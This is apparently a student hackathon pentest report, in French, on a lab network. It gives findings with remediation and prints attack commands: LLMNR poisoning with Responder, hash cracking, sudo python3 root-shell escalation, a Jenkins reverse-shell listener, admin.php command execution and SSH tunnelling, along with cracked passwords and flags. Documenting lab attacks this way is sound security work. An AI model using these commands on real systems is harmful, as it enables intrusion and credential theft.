Rapport HACKATHON

# Rapport HACKATHON ## Sommaire [toc] --- ## Présentation de l'entreprise <img style="width:300px;" src="https://hackmd.io/_uploads/Byp8cj4EA.png"/> **BubbleBusters** ### Contexte Introduction : L'entreprise BubbleBuster est une société spécialisée en cybersécurité. Notre client a souhaité faire appel à notre expertise afin de se prévenir d'éventuels attaques. Leur infrastructure IT, hébergée sur le domaine "infra-05.ipssi.cloud", comprend plusieurs serveurs dédiés à diverses fonctions critiques telles que le stockage de données, la gestion d'applications internes, et la gestion d'un annuaire . L'entreprise accorde une grande importance à la sécurité de ses systèmes et souhaite s'assurer que ses défenses sont robustes contre les menaces potentielles. Objectif du Pentest : L'objectif principal de ce test de pénétration est d'identifier les vulnérabilités potentielles dans l'infrastructure de l'entreprise, spécifiquement sur le domaine "infra-05.ipssi.cloud" ainsi que sur toute l'infrastructure découverte. Les vulnérabilités pourraient inclure des faiblesses dans la configuration des serveurs, des problèmes de sécurité liés à des applications, des erreurs de configuration réseau, ainsi qu'une large diversité de vulnérabilités. --- ## Perimètre Description du périmètre: Cet audit se concentre exclusivement sur infra-05.ipssi.cloud ainsi que sur toutes les machines de l'infrastructure, à l'exception des ports 8006 et 64220 qui sont hors champ d'investigation. ![Untitled Diagram(1).drawio](https://hackmd.io/_uploads/S1FKlZ8ER.png) --- ## Modèle de classification | Niveau | Plage de score | Impacte | Couleur | |---|---|---|---| | Critique | 9-10 | Risque de perte de l'environnement de production immédiate | Rouge | | Élevé | 7-8 | Mise en danger de l'environnement de production | Orange | | Moyen | 5-6 | Mise en danger des services non lier à l'environnement de production | Jaune | | Faible | 3-4 | Fuite de données | Blue | | Information | 0-2 | Découverte présenté à titre d'information | Vert | --- ## Failles et vulnérabilitées ### [Critique] Lancement de commande système depuis la page d'administration #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Lancement de commande système depuis la page d'administration | | Niveau | Critique | | Score | 9 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Lancement de commande système depuis la page d'admin via un bouton "OnClick" | | Remédiation | Retirer la fonctionnalité qui permet d'exécuter des commandes système directement depuis le frontend via le bouton "OnClick", implémentez des contrôles d'accès robustes pour restreindre l'accès aux pages et fonctionnalités d'administration | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/admin.php ![image](https://hackmd.io/_uploads/B1Q9Y244R.png) --- ### [Critique] Fuite d'information de connexion à la page d'administration - Robots.txt #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'information de connexion a la page d'administration | | Niveau | Critique | | Score | 9 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Le fichier robots.txt contient le User-Agent permettant l'accès à la page /admin.php | | Remédiation | Modifier le robots.txt afin de tout Disallow et mettre en exception (Allow) l'accès à une page spécifique | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/robots.txt ```bash $ curl http://infra-05.ipssi.cloud/newsletter/robots.txt User-Agent: TropSmartUserAgentAdminHeHeHe Allow: /admin.php User-Agent: * Disallow: /admin.php Disallow: FLAG{C3sTQu01UnU53r4G3nT?} ``` --- ### [Critique] Connexion a la page d'administration sans identifiant #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Connexion a la page d'administration sans identifiant | | Niveau | Critique | | Score | 9 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Vulnérabilité permettant de se connecter sans identifiants sur la page d'administration /admin.php en utilisant le User-Agent.| | Remédiation | Limitez l'accès à admin.php à des adresses IP spécifiques au réseau local. | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/admin.php ![image](https://hackmd.io/_uploads/Hk1o5nN4R.png) ![image](https://hackmd.io/_uploads/r1ya9hNNC.png) --- ### [Élevé] Fuite d'identifiant a une machine #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'identifiant a une machine | | Niveau | Élevé | | Score | 7 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Fuite d'identifiant pour le service de terminal à distance. | | Remédiation | Les clefs ssh ne doivent pas être stockées sur la machine que'lle permet d'accéder. | #### Information technique de la découverte ![image](https://hackmd.io/_uploads/rJBKRgMVC.png) ![image](https://hackmd.io/_uploads/r1-jCgf4C.png) ![image](https://hackmd.io/_uploads/rkIF5lMNR.png) --- ### [Élevé] Fuite d'information - Base de donnée #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'information - Base de donnée | | Niveau | Élevé | | Score | 7 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Fuite d'informations contenues dans la base de données du site dûe l'accès non contrôlé du fichier base de données. | | Remédiation | Modifier les droits d'accès au fichier pour qu'il ne soit pas accessible via l'URL. | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/truc.db ```bash $ wget http://infra-05.ipssi.cloud/newsletter/truc.db Saving to: ‘truc.db’ truc.db 100%[============================>] 76.00K --.-KB/s in 0.1s 2024-05-27 13:24:13 (671 KB/s) - ‘truc.db’ saved [77824/77824] ``` ```bash $ sqlite3 sqlite> .open "truc.db" sqlite> .tables mails secrets sqlite> SELECT * FROM secrets; FLAG{F4c1l3ATr0uv3r} ``` --- ### [Élevé] Fuite des identifiants d'un utilisateur de l'AD #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de credentials - utilisateur AD | | Niveau | Élevé | | Score | 8 | | Hôte | 192.168.0.100 | | Description | Capture de hash d'un mot de passe via le protocole NTLMv2-SSP. | | Remédiation | Désactivation des protocole de noms non sécurisés NTLMv2-SSP, LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS over TCP/IP),MDNS (Multicast DNS). | #### Information technique de la découverte ```bash $ python3 Responder.py -I eth0 -wF -v [*] [LLMNR] Poisoned answer sent to 192.168.0.101 for name toto [SMB] NTLMv2-SSP Client : fe80::dd0e:5afb:9a8c:a89b [SMB] NTLMv2-SSP Username : BUBBLE\tomega[SMB] NTLMv2-SSP Hash : tomega::BUBBLE:c91c3b887cd[...]0000000000000 ``` ```bash $ hashcat -m 5600 -a 0 -o cracked.txt hash.txt /home/kali/Downloads/rockyou.txt TOMEGA::BUBBLE:c91c3b887c[...]0000000000:iamtheomega ``` --- ### [Élevé] Escalation de privilège depuis rebond #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Escalation de privilège| | Niveau | Élevé | | Score | 8 | | Hôte | 192.168.0.2 | | Description | Utilisation d'une commande pour obtenir un shell root. | | Remédiation | Restreindre l'accès sudo pour Python. | #### Information technique de la découverte Depuis rebond ```bash rebond@NewsLetter:~$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' root@NewsLetter:/home/rebond# ``` autre façon : ```bash sudo python3 -c 'import os; os.system("su root")' ``` --- ### [Élevé] Obtention d'un shell via la pipeline (192.168.0.81) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Obtention d'un shell | | Niveau | Élevé | | Score | 7 | | Hôte | 192.168.0.81 | | Description | Commande python sur une pipeline Jenkins pour établir un Reverse Shell | | Remédiation | Configuration sécurisée limitation des autorisations des utilisateurs, la configuration d'une authentification forte, la désactivation des fonctionnalités non utilisées et la restriction de l'accès aux API sensibles. | #### Information technique de la découverte ![image](https://hackmd.io/_uploads/BkAdkYXVA.png) ![image](https://hackmd.io/_uploads/S1YCouXEA.png) ```bash root@NewsLetter:/home/rebond# nc -lvnp 4242 Listening on 0.0.0.0 4242 Connection received on 192.168.0.80 55808 $ pwd /var/lib/jenkins/workspace/ContinuousIntegration ``` --- ### [Élevé] Escalation de privilège Pipeline Jenkins to root (192.168.0.80) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Escalation de privilège | | Niveau | Élevé | | Score | 8 | | Hôte | 192.168.0.80 | | Description | Commande python pour obtenir les privilèges root sur 192.168.0.80 | | Remédiation | Configuration sécurisée limitation des autorisations des utilisateurs, la configuration d'une authentification forte, la désactivation des fonctionnalités non utilisées et la restriction de l'accès aux API sensibles. | #### Information technique de la découverte ```bash root@NewsLetter:/home/rebond# nc -lvnp 4242 Listening on 0.0.0.0 4242 Connection received on 192.168.0.80 55808 $ sudo -l Matching Defaults entries for jenkins on JenkinsCI: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User jenkins may run the following commands on JenkinsCI: (root) NOPASSWD: /usr/bin/python3 $ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' root@JenkinsCI:/# ``` --- ### [Élevé] Exécution de commandes via admin.php (infra-05.ipssi.cloud) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Exécution de commandes via admin.php | | Niveau | Élevé | | Score | 7 | | Hôte | infra-05.ipssi.cloud | | Description | Il est possible d'exécuter des commandes système via la page admin.php. | | Remédiation | Valider et filtrer les entrées utilisateur pour éviter l'exécution de commandes arbitraire. | #### Information technique de la découverte ```bash http://infra-05.ipssi.cloud/admin.php?cmd=ls ``` --- ### [Moyen] Obtention des identifiants de localadm (Gitea) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Obtention d'identifiant | | Niveau | Moyen | Score | 6 | | Hôte | 192.168.0.81 | | Description |Obtention des identifiants de localadm (sur gitea), même mot de passe du compte "tomega". | | Remédiation | Utiliser des mots de passe plus forts, ne pas utiliser le même mot de passe pour plusieurs comptes. | #### Information technique de la découverte <img style="width:500px;" src="https://hackmd.io/_uploads/ByPp1dXER.png"/> --- ### [Moyen] Obtention des identifiants de localadm (Jenkins) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Obtention d'identifiant | | Niveau | Moyen | Score | 6 | | Hôte | 192.168.0.80 | | Description | Même identifiant que le compte localadm de Gitea. | | Remédiation | Utiliser des mots de passe plus forts, ne pas utiliser le même mot de passe pour plusieurs comptes. | #### Information technique de la découverte Password identique avec Gitea, Outil BurpSuite/Hydra utilisé pour Bruteforce à partir de notre précédente Wordlist (Wordlist créée au fur et à mesure du Pentest avec les informations d'identifiants/mdp collectés.) --- ### [Moyen] Obtention d'identifiant sur 192.168.0.123:8080/config.php #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Obtention d'identifiant | | Niveau | Moyen | | Score | 6 | | Hôte | 192.168.0.123 | | Description | Obtention des identifiants du compte "john" sur la page web 192.168.0.123:8080/config.php | | Remédiation | Supprimer les identifiants enregistrés dans les endroits non sécurité. Enregistrer ses identifiants dans un outil de gestionnaire de mots de passe sécurisée. | #### Information technique de la découverte ![image](https://hackmd.io/_uploads/H1IpB-IVC.png) ![image](https://hackmd.io/_uploads/BJvASWUER.png) ```bash $ ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 9000:192.168.0.123:22 Enter passphrase for key 'rebond-privkey': $ ssh -o "ServerAliveInterval 30" -p 9000 john@localhost The authenticity of host '[localhost]:9000 ([::1]:9000)' can't be established. ED25519 key fingerprint is SHA256:kTCO1tKcJjEfg+Zxs9uLzX/dGZTzHdYQgLqltUxU5SA. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[localhost]:9000' (ED25519) to the list of known hosts. john@localhost's password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 6.8.4-3-pve x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro Last login: Wed May 29 10:00:48 2024 from 192.168.0.2 john@Sect:~$ ``` --- ### [Moyen] Fichier caché d'un utilisateur #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Obtention du mot de passe admin de l'AD | | Niveau | Moyen | | Score | 5 | | Hôte | 192.168.0.101 | | Description | Le contenu du fichier .hidden.txt comportait un flag ainsi qu'une chaîne encodée en base 64 qui est le mot de passe du compte admin | | Remédiation |Suppression ou restriction de l'accès au fichier hidden.txt, chiffrer son contenu | #### Information technique de la découverte > C:\Users\Public\Public Bubbles\ .hidden.txt ![image(2)](https://hackmd.io/_uploads/HJgZ2LQVC.png) ![image](https://hackmd.io/_uploads/rJxbLL74C.png) --- ### [Moyen] Mauvaise configuration de service - SSH (192.168.0.2) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Mauvaise configuration de service | | Niveau | Moyen | Score | 5 | | Hôte | 192.168.0.2 - infra-05.ipssi.cloud | | Description | La configuration SSH nous permis d'utiliser 192.168.0.2 comme passerelle pour un tunnel afin d'accèder aux autres machines du réseau | | Remédiation | Durcir la configuration SSH pour bloquer l'utilisation de tunnel via ce service. | #### Information technique de la découverte ```bash $ ssh -o "ServerAliveInterval 30" -i rebond-privkey -N rebond@infra-05.ipssi.cloud -L 9000:192.168.0.123:22 ``` --- ### [Moyen] Fuite de données 192.160.0.123:8080/admin.php #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Moyen | Score | 5 | | Hôte | 192.168.0.123 | | Description | Accès à une page d'administration et fuite de données.| | Remédiation | Ne pas se baser sur les données envoyé par le navigateur. Revoir le système d'authentification. | #### Information technique de la découverte ![image](https://hackmd.io/_uploads/SJRoxK44R.png) ![image](https://hackmd.io/_uploads/rkoRgYVVA.png) --- ### [Faible] Fuite de données 192.168.0.123 #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.123 | | Description | La page web du serveur Bubble Web Server 3.0 sur le port 80 contient une donnée. | | Remédiation | S'assurer que les informations sensibles ne sont pas exposées. | #### Information technique de la découverte ```bash $ nmap -sV 192.168.0.123 -p 80 PORT STATE SERVICE VERSION 80/tcp open http Bubble Web Server 3.0 SF-Port80-TCP:V=7.80%I=7%D=5/29%Time=6656E320%P=x86_64-pc-linux-gnu%r(TLSSessionReq, SF:216,"HTTP/1\.1\x20[...]\n<h1 SF:>FLAG{8uBb1es3v3rywh3re}</h1>\n [...] SF:00--></body>\n</html>\n"); ``` --- ### [Faible] Fuite de données sur le fichier text du bureau (192.168.0.101) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.101 | | Description | Un fichier texte "Enquete.txt" sur le bureau contient une donnée sensible. | | Remédiation | Sensibiliser les utilisateurs, supprimer les fichiers contenant des données sensibles, chiffrer le fichier. | #### Information technique de la découverte > C:\Users\tomega\Desktop\Enquete.txt <img style="width:300px;" src="https://hackmd.io/_uploads/SkXai2SNA.png"/> --- ### [Faible] Fuite de données sur un site web (192.168.0.200) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.200 | | Description | Une page web qui ne devrait pas être acessible l'est via l'URL : `http://192.168.0.200:9999/mirror` | | Remédiation | Sensibiliser les utilisateurs, supprimer l'accès à cette page ou la supprimer complètement. | #### Information technique de la découverte > http://localhost:9999/mirror <img style="width:500px;" src="https://hackmd.io/_uploads/BJe13TXMN0.png"/> --- ### [Faible] Fuite de données sensibles (192.168.0.123:8080/config.php) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de donnée sensible | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.123 | | Description | Fuite donnée critique sur l'url "192.168.0.123 8080/config.php" Cette page ne devrait pas être accessible. | | Remédiation | Sensibiliser les utilisateurs, supprimer l'accès à cette page et supprimer les informations présentes (mots de passe et autres). | #### Information technique de la découverte <img style="width:500px;" src="https://hackmd.io/_uploads/r13TPdV4R.png"/> --- ### [Faible] Fuite de données sensibles (192.168.0.123) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de donnée sensible | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.123 | | Description | Fuite d'information en inspectant le code de la page : http://localhost:8080/index.php | | Remédiation | Supprimer l'information identifiée en commentaire de la page. Bonne pratique : faire vérifier par un collaborateur son code avant la mise en production (les commentaires sont visibles en inspectant le code source).| #### Information technique de la découverte ![image](https://hackmd.io/_uploads/SyXQfOV4R.png) --- ### [Faible] Fuite de données - via URL (192.168.0.2 - infra-05.ipssi.cloud) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.2 - infra-05.ipssi.cloud | | Description | Fuite données critique sur l'url `http://infra-05.ipssi.cloud/newsletter/flag/flag.txt`. Cette page ne devrait pas être accessible/exister. | | Remédiation | Sensibiliser les utilisateurs, supprimer l'accès à cette page ou la supprimer complètement. | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/flag/flag.txt ```bash curl http://infra-05.ipssi.cloud/newsletter/flag/flag.txt FLAG{G0bu5T3r1s4G0oD1d3A} ``` --- ### [Faible] Enumeration des ports (192.168.0.0/24) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Enumeration des ports | | Niveau | Faible | | Score | 3 | | Hôte | Multiple | | Description | L'énumération des ports a révélé plusieurs services ouverts qui peuvent être exploités. | | Remédiation | Restreindre les ports ouverts et appliquer des règles de firewall appropriées. | #### Information technique de la découverte ```bash nmap -p- -sV 192.168.0.0/24 ``` --- ### [Faible] Bannière des services (192.168.0.0/24) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Bannière des services | | Niveau | Faible | | Score | 3 | | Hôte | Multiple | | Description | Les bannières de services exposent des informations sensibles qui peuvent aider à identifier les versions et les vulnérabilités. | | Remédiation | Désactiver ou modifier les bannières pour ne pas exposer d'informations sensibles. | #### Information technique de la découverte ```bash nmap -sV --script=banner 192.168.0.0/24 ``` --- ### [Faible] Fuite de données sur le fichier .txt du bureau 192.168.0.100 #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fichier .txt sensible sur le bureau | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.100| | Description | Un fichier texte "flag.txt" sur le bureau contient une donnée sensible. | | Remédiation |Sensibiliser les utilisateurs, supprimer les fichiers contenant des données sensibles, chiffrer le fichier. | #### Information technique de la découverte >C:\Users\Administrator\Desktop\flag.txt ![image](https://hackmd.io/_uploads/Sy880_74C.png) --- ### [Faible] Fuite de données clé de registre dans l'AD (192.168.0.100) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.100 | | Description | Donnée sensible non protégée dans les clés de registre du serveur AD. | | Remédiation | Deux possibilités : Si stockage de données dans la base de registres, celles-ci doivent être chiffrées. Si stockage de mots de passe, ceux-ci doivent être hachés. | #### Information technique de la découverte ```powershell Get-ChildItem HKLM: -Recurse | findstr -i FLAG ``` ![image](https://hackmd.io/_uploads/BJ1j8AS4A.png) --- ### [Faible] Fuite de données - fichier flag.txt (192.168.0.2 - infra-05.ipssi.cloud) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.2 - infra-05.ipssi.cloud | | Description | Fuite de donnée dans un fichier non protéger. | | Remédiation | Sensibiliser les utilisateurs, limiter l'accès au fichier aux personnels concerner ou le supprimer complètement, chiffrer le fichier. | #### Information technique de la découverte > /home/rebond/flag.txt ``` rebond@NewsLetter:~$ cat flag.txt FLAG{U53rR3b0Nd} ``` --- ### [Faible] Fuite d'information sur la page web 192.168.0.123:8080/config.php #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'information | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.123 | | Description | Contenu sensible (mots de passe) sur la page web 192.168.0.123:8080/config.php | | Remédiation | Enregistrer les mots de passe sur des outils de gestionnaire de mot de passe sécurisé. Supprimer les informations sensibles qui ne sont pas protégées. | #### Résumé de la découverte ![image](https://hackmd.io/_uploads/SkNmefLNC.png) #### Information technique de la découverte --- ### [Faible] Fuite de données sur le fichier text de l'utilisateur john (192.168.0.123) #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite de données | | Niveau | Faible | | Score | 3 | | Hôte | 192.168.0.101 | | Description | Un fichier texte ".flag" dans le dossier "home" de l'utilisateur contient une donnée sensible. | | Remédiation | Sensibiliser les utilisateurs, supprimer les fichiers contenant des données sensibles, chiffrer le contenue du fichier. | #### Information technique de la découverte > /home/john/.flag ```bash john@Sect:~$ ls -la total 36 drwxr-x--- 4 john john 4096 May 28 14:41 . drwxr-xr-x 3 root root 4096 May 28 14:05 .. -rw------- 1 john john 412 May 29 09:36 .bash_history -rw-r--r-- 1 john john 220 May 28 14:05 .bash_logout -rw-r--r-- 1 john john 3771 May 28 14:05 .bashrc drwx------ 2 john john 4096 May 28 14:41 .cache -rw-rw-r-- 1 john john 24 May 28 14:07 .flag drwxrwxr-x 3 john john 4096 May 28 14:07 .local -rw-r--r-- 1 john john 807 May 28 14:05 .profile john@Sect:~$ cat .flag FLAG{7h4tW4s34syr1ght?} ``` --- ### [Information enumeration des hôtes] | Nom | Valeur | |---|---| | Type | Reconnaissance réseau | | Niveau | Information | | Score | 2 | | Hôte | 192.168.0.1/24 | | Description | Lateralisation : enumeration des hôtes | | Remédiation | Interdire le ping où le limitait aux hôtes qui en on besoin via des règles de pare-feu. | #### Information technique de la découverte ```bash root@NewsLetter:/home/rebond# nmap -sn 192.168.0.1/24 Nmap scan report for 192.168.0.1 Host is up (0.00014s latency). Nmap scan report for 192.168.0.80 Host is up (0.000033s latency). Nmap scan report for 192.168.0.81 Host is up (0.000063s latency). Nmap scan report for 192.168.0.100 Host is up (0.00023s latency). Nmap scan report for 192.168.0.101 Host is up (0.00015s latency). Nmap scan report for 192.168.0.123 Host is up (0.000052s latency). Nmap scan report for 192.168.0.200 Host is up (0.00016s latency). ``` | host | hostname | |---|---| | 192.168.0.1 | gateway | | 192.168.0.2 | NewsLetter | | 192.168.0.80 | Jenkins | | 192.168.0.81 | Gitea | | 192.168.0.100 | Windows Server | | 192.168.0.101 | Windows Client | | 192.168.0.123 | Linux Ubuntu | | 192.168.0.200 | Les maths c'est nul | --- ### [Information] Fuite d'information - requête POST #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'information - requête POST | | Niveau | Information | | Score | 2 | | Hôte | 192.168.0.2 (infra-05.ipssi.cloud) | | Description | Fuite d'information d'un potentiel utilisateur. | | Remédiation | Supprimer le fichier `n`. | #### Information technique de la découverte > http://infra-05.ipssi.cloud/newsletter/n ```bash $ curl http://infra-05.ipssi.cloud/newsletter/n POST /newsletter/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 [...] Sec-Fetch-User: ?1 t=oui.truc@gmail.com ``` --- ### [Information] Fuite d'information - liste des utlisateurs #### Résumé de la découverte | Nom | Valeur | |---|---| | Type | Fuite d'information - liste des utlisateurs | | Niveau | Information | | Score | 2 | | Hôte | 192.168.0.81 | | Description | Fuite d'information d'un potentiel utilisateur. | | Remédiation | Supprimer le fichier `n`. | #### Information technique de la découverte > http://localhost:3000/explore/users/sitemap-1.xml ```xml $ curl http://localhost:3000/explore/users/sitemap-1.xml <?xml version="1.0" encoding="UTF-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://192.168.0.81:3000/localadm</loc> <lastmod>2024-05-24T20:45:53Z</lastmod> </url> </urlset> ``` --- ## Annexe ### Les Flags découverts | Flag | hôte | location | |---|---|---| | FLAG{C3sTQu01UnU53r4G3nT?} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/robots.txt | | FLAG{G0bu5T3r1s4G0oD1d3A} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/flag/flag.txt | | FLAG{L0uRd3 M3sUr3} | 192.168.0.2 (infra-05.ipssi.cloud) | `curl http://infra-05.ipssi.cloud/newsletter/admin.php -A "TropSmartUserAgentAdminHeHeHe"` | | FLAG{F4c1l3ATr0uv3r} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/truc.db | | FLAG{U53rR3b0Nd} | 192.168.0.2 (infra-05.ipssi.cloud) | `rebond@NewsLetter:~$ cat /home/rebond/flag.txt` | | FLAG{M1r01RM1r01R} | 192.168.0.200 | http://localhost:9999/mirror | | FLAG{P4t1C13Nc31SEv3R1tH1nG} | 192.168.0.101 | `C:\Users\tomega\Desktop\Enquete.txt` | | FLAG{H1dD3nF1l3Sr34Lly?} | 192.168.0.101 | `C:\Users\Public\Public Bubbles\.hidden.txt` | | FLAG{M0i4u5SiJ4d0R3L3sBuLl35} | 192.168.0.101 | `C:\Users\Administrator\Desktop\flag.txt` | | FLAG{S0fCk1nEz??????} | 192.168.0.100 | `C:\Users\Administrator\Desktop\flag.txt` | | FLAG{8uBb1es3v3rywh3re}| 192.168.0.123 | nmap de l'ip 192.168.0.123 | | FLAG{0hMyLF1!!} | 192.168.0.123 | 127.0.0.1:8080/config.php | | FLAG{4h...C0mm3nts...}| 192.168.0.123 | comment on source code :8080/index.php | | FLAG{r3gizi} | 192.168.0.100 | Clef de registre dans l'AD | | FLAG{7h4tW4s34syr1ght?} | 192.168.0.123 | `/home/john/.flag` | | FLAG{s3ct4ryBub113s} | 192.168.0.123 | `http://localhost:8080/admin.php` | --- ### Wordlist obtenue ``` JADORELESBULLES TropSmartUserAgentAdminHeHeHe oui.truc@gmail.com oui truc oui.truc mirroir administrator Administrator bubble.dev bubble dev tomega omega iamtheomega localadm 424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76 secret.key flag uoddsfhhbhkdhhh8 john toto ``` --- ### Liste des outils utilisés | outil | Utilisation faite de l'outil | |---|---| | nmap | Nmap est un scanner de ports , il est conçu pour détecter les ports ouverts, identifier les services hébergés et obtenir des informations sur le système d'exploitation d'un ordinateur distant. | | gobuster | Gobuster est un outil de fuzzing , il permet de découvrir des fichiers et des répertoires cachés sur un serveur web en utilisant des listes de mots (wordlists). | | curl | cURL est un outil de ligne de commande que vous pouvez utiliser pour transférer des données via des protocoles réseau. | | remmina | Client RDP. | | responder | Responder est un outil « multithread » permettant de répondre à des requêtes IPv4 LLMNR et NBT-NS pour mener des opérations de poisoning de manière automatique. En plus de ces fonctions de poisoning, on y retrouve également des serveurs Rogue disposant d’une fonction de collecte des valeurs de hachage NTLMv1/v2 ou dans certain cas le mot de passe en clair. | | ssh | ssh permet d'établir des connexions chiffrées à distance entre des ordinateurs. | | john the ripper | John the Ripper (ou JTR, ou John) est un logiciel libre de cassage de mot de passe, utilisé notamment pour tester la sécurité d'un mot de passe (audit, crack) | | hashcat | Hashcat permet de réaliser une attaque par collision sur des empreintes cryptographiques. | | python3 | Python3 est un interpreteur pour Python qui est un langage de programmation informatique généraliste. | | sudo -l | Commande qui affiche les droits super utilisateur d'un utilisateur. | | burpsuite | Burpsuite est un outil de sécurité des applications web qui identifie et exploite les vulnérabilités, analyse les requêtes et réponses HTTP/S, et scanne automatiquement les failles de sécurité. | | cyberchef | CyberChef est une application qui permet d’effectuer une opération ou une série d’opérations sur un texte ou un fichier. | | hydra | Hydra est un script open source permettant de générer des attaques de type dictionnaire/bruteforce sur un grand nombre de protocoles. | ___ ### Scan des ports sur les assets scannés du réseau local : #### nmap 192.168.0.80 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.80 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:47 UTC Nmap scan report for 192.168.0.80 Host is up (0.0000090s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Jetty 10.0.20 MAC Address: BC:24:11:1A:E1:45 (Unknown) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds ``` | port | protocol | service | |---|---|---| | 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) | | 8080 | http | Jetty 10.0.20 | --- #### nmap 192.168.0.81 ```bash root@NewsLetter:/home/rebond# nmap -sV 192.168.0.81 -p 1-65000 Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 14:01 UTC Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 14:03 (0:00:46 remaining) Nmap scan report for 192.168.0.81 Host is up (0.0000090s latency). Not shown: 64998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) 3000/tcp open ppp? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.80%I=7%D=5/27%Time=66549251%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x SF:20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control: SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConte SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea= SF:08a5c5196903186e;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie SF::\x20_csrf=evIy1t3zoIUSe1yD4NGsT2Jq7586MTcxNjgxODUxMzY3NzI0MDE2Nw;\x20P SF:ath=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Option 